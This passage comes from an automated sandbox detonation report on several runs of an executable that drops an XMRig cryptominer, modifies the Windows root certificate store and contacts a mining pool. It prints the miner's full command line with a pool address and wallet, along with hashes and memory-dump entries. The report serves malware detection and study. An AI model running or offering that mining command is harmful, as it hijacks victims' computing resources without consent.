bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2592-16-0x000001C596190000-0x000001C5961B0000-memory.dmp

memory/2592-17-0x000001C597A80000-0x000001C597AA0000-memory.dmp

memory/2592-18-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-21-0x000001C62A470000-0x000001C62A490000-memory.dmp

memory/2592-20-0x000001C62A450000-0x000001C62A470000-memory.dmp

memory/2592-19-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-22-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-23-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-24-0x000001C62A450000-0x000001C62A470000-memory.dmp

memory/2592-25-0x000001C62A470000-0x000001C62A490000-memory.dmp

memory/2592-26-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-27-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-28-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-29-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-30-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-31-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-32-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-33-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-34-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-35-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-36-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-37-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-38-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-39-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-40-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-41-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-42-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-43-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-44-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-45-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-46-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-47-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-48-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-49-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-50-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-51-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-52-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-53-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-54-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-55-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-56-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-57-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-58-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-59-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-60-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-61-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-62-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-63-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-64-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-65-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-66-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-67-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-68-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-69-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-70-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-71-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-72-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-73-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-74-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-75-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-76-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-77-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-78-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-79-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-80-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-81-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-82-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-83-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

memory/2592-84-0x00007FF741EB0000-0x00007FF7429B3000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:52

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2572-16-0x000002C35CEB0000-0x000002C35CED0000-memory.dmp

memory/2572-17-0x000002C35D100000-0x000002C35D120000-memory.dmp

memory/2572-18-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-20-0x000002C35E8D0000-0x000002C35E8F0000-memory.dmp

memory/2572-19-0x000002C35E8F0000-0x000002C35E910000-memory.dmp

memory/2572-21-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-22-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-23-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-25-0x000002C35E8D0000-0x000002C35E8F0000-memory.dmp

memory/2572-24-0x000002C35E8F0000-0x000002C35E910000-memory.dmp

memory/2572-26-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-27-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-28-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-29-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-30-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-31-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-32-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-33-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-34-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-35-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-36-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-37-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-38-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-39-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-40-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-41-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-42-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-43-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-44-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-45-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-46-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-47-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-48-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-49-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-50-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-51-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-52-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-53-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-54-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-55-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-56-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-57-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-58-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-59-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-60-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-61-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-62-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-63-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-64-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-65-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-66-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-67-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-68-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-69-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-70-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-71-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-72-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-73-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-74-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-75-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-76-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-77-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-78-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-79-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-80-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-81-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-82-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-83-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

memory/2572-84-0x00007FF738F20000-0x00007FF739A23000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:54

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1796s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
